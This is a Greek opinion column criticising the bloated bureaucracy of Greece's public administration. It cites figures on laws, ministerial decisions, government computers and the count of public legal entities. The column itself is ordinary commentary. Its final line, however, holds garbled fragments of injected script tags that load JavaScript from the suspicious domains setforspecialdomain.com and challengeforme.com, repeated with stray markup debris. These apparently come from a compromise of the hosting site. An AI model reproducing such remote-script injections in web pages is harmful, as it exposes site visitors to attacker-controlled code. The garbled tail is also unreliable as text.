Τα «νούμερα» που μας κυβερνούν. Του Θαλή Κουτούπη

0046

ΜΕΓΑΛΟ, ΟΣΟ ΚΑΙ ΤΟ ΠΡΟΒΛΗΜΑ!

Δεν εννοώ την κυβέρνηση. Όχι επειδή δεν είναι «νούμερα». Αλλά επειδή δεν κυβερνούν. Είναι αδύνατο να κυβερνηθεί η Ελλάδα με τη μορφή και τη δομή που έχει σήμερα η Δημόσια Διοίκηση. Είναι αδύνατο! Όσες μεταρρυθμίσεις κι αν σχεδιάζουν οι ελάχιστοι μεταρρυθμιστές του διοικητικού μηχανισμού, προσκρούουν σε ένα συμπαγές τείχος, σε ένα αδιαπέραστο μπετόν – αρμέ της πιο παρανοϊκής γραφειοκρατίας  του κόσμου.

Ας μιλήσουμε λοιπόν με αριθμούς. Η Δημόσια Διοίκηση διαθέτει 23.142 (!) αρμοδιότητες, από τις οποίες οι 10.765 είναι επιτελικές, οι 9.816 υποστηρικτικές, οι 998 παροχής υπηρεσιών και οι 1563 ελεγκτικές. Πώς καθορίστηκαν αυτές οι αρμοδιότητες; Φυσικά με ρυθμιστικές διατάξεις! Από το 1975 ως το 2005 εκδόθηκαν από το τέρας της Δ. Διοίκησης 171.500 πράξεις νομοθετικού περιεχομένου! Ιδού η… παραγωγή αναλυτικά:

3.430 Νόμοι

20.580  Προεδρικά διατάγματα,

114.905  Υπουργικές Αποφάσεις,

24.010  Αποφάσεις Περιφερειών

8.575 Αποφάσεις Νομαρχιών

Τι βλέπετε;

Τη μερίδα του λέοντος (67%) έχουν οι Υπουργικές Αποφάσεις, αυτές δηλαδή που δεν περνούν από τη Βουλή! Ενώ οι νόμοι είναι μόνο το 2%! Σε απλά ελληνικά: το κοινοβουλευτικό μας σύστημα είναι κανονική «μούφα». Συνεδρίαζε, τάχα μου, το Νομοθετικό Σώμα και, μέσα σε 30 χρόνια, παρήγαγε μόνο το 2% των διατάξεων που διέπουν τη ζωή μας. Το υπόλοιπο 98% ήταν «στο μιλητό», ένα είδος παρανομοθεσίας, που το Σύνταγμα προβλέπει μόνο σε έκτακτες περιπτώσεις εθνικής ανάγκης!!!

Αλλά σιγά να μη σεβαστεί ο πολιτικός κόσμος το Σύνταγμα. Εδώ δε σέβεται τους ανθρώπους που ψάχνουν στα σκουπίδια, θα σεβαστεί μια… παλιοφυλλάδα; Αφού, ποιαν άλλη αντίληψη έχουν για το Σύνταγμα αυτοί που μας «κυβερνούν», όταν διαβάζουν στο άρθρο 74παράγραφος 5 το εξής κατανοητό και για παιδί του Δημοτικού:

«Προσθήκη ή τροπολογία άσχετη με το κύριο αντικείμενο του νομοσχεδίου ή της πρότασης νόμου δεν εισάγεται για συζήτηση». Πόσες φορές παραβιάστηκε βάναυσα αυτή η διάταξη από όσους ορκίστηκαν πίστη στο Σύνταγμα; Κάθε μέρα! Οι άσχετες διατάξεις είναι ο κανόνας όχι η εξαίρεση! Κι όταν είναι καραμπινάτη λαμογιά, για να μη μας πάρουν είδηση, το φέρνουμε σαν «τσόντα», την τελευταία στιγμή, στο νομοσχέδιο για την προστασία της αρκούδας της Πίνδου και το ψηφίζουμε απνευστί τα μεσάνυχτα!!! Δεν είναι κοινοβουλευτισμός αυτό, οργανωμένο έγκλημα είναι!

Ας συνεχίσουμε, όμως, με τους αριθμούς για τις τεχνολογικές υποδομές της κεντρικής κυβέρνησης. Έχουν υπολογιστές; Αμέ! Και περισσεύουν κιόλας! 54.927 τερματικές συσκευές, (ποσοστό κάλυψης 102%!). Αυτές υποστηρίζονται από 2.983 εξυπηρετητές! Αλλά το συγκλονιστικό είναι αλλού: υπάρχουν μόνο 332 βάσεις δεδομένων και μόνο 13.343 υπηρεσιακές γραμμές ηλεκτρονικής αλληλογραφίας, (ποσοστό κάλυψης 25%).Με τι επικοινωνούν οι υπόλοιποι χωρίς ηλεκτρονική αλληλογραφία; Στέλνουν τον κλητήρα να παραδώσει το έγγραφο; Μήπως ο υπολογιστής στο γραφείο τους είναι μόνο για πασιέντζες, ή είναι πάντα κλειστός, για ντεκόρ; Τι σημαίνει αγοράζουμε υπολογιστές με τη σέσουλα, χωρίς να ενδιαφερόμαστε να τους χρησιμοποιήσουμε; Σημαίνει πως ήταν πολλά τα λεφτά της μίζας για τον προμηθευτή και για εκείνον που ενέκρινε την προμήθεια.

Ο ανοικονόμητος φαταούλας: το Ελληνικό Δημόσιο! Πάρτε μια γεύση… χρηστής διαχείρισης:

69 Δημόσια Νομικά Πρόσωπα υπάρχουν για την εκπαίδευση και κατάρτιση,

54 ΔΝΠ για την επιχειρηματικότητα και την απασχόληση,

19 ΔΝΠ για χωροταξικό σχεδιασμό & έλεγχο δόμησης,

56 ΔΝΠ για την έρευνα και την ανάπτυξη,

209 ΔΝΠ για τον πολιτισμό και την ψυχαγωγία!

Να το ξαναπώ:

209 Νομικά Πρόσωπα με τον πρόεδρο, το συμβούλιο, τα γραφεία, τους μισθούς, τα επιδόματα,

τα έξοδα κίνησης, τα αναλώσιμα, για να φροντίσουν τον πολιτισμό, (δήθεν) και την ψυχαγωγία,

–σίγουρα, όσων διορίστηκαν εκεί από το παράθυρο!

Κι όμως.

Δεν σκέφτονται πως τα 209 μπορούν να τα κάνουν 208 και να μην πάθει τίποτε απολύτως η ψυχαγωγία.

Το μονο που ενδιαφερει ειναι να πληρωθούν οι λεβέντες μας στα 209 ΔΝΠ για την ψυχαγωγία!

Χρεοκοπήστε τις επιχειρήσεις, χάστε τις δουλειές σας οι εργαζόμενοι, αρκεί να μην πειράξουμε ούτε μια τρίχα στα 54 ΔΝΠ για την επιχειρηματικότητα και την απασχόληση!

Δηλαδή όταν ήταν 53 τα ΔΝΠ και έφτιαχναν το τελευταίο, (μέχρι στιγμής), δεν βρέθηκε ένας να πει:ντροπή     ρε παιδιά,

Ποιαν επιχειρηματικότητα;

Φυσικά και δεν βρέθηκε αφού θα έπρεπε κάποιος να έχει μετρήσει τους προηγούμενους οργανισμούς, για   να ξέρει πόσοι είναι.

Αλλά τα νούμερα που μας κυβερνούν το απέδειξαν, χρόνια τώρα: δεν ξέρουν να μετρούν.

Υ.Γ.Τα στοιχεία απο τον καθηγητή της Εθνικής Σχολής Δημόσιας Διοίκησης, Παναγιώτη Καρκατσούλη

Δείτε όλα τα άρθρα του Θαλή Κουτούπη εδώ___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >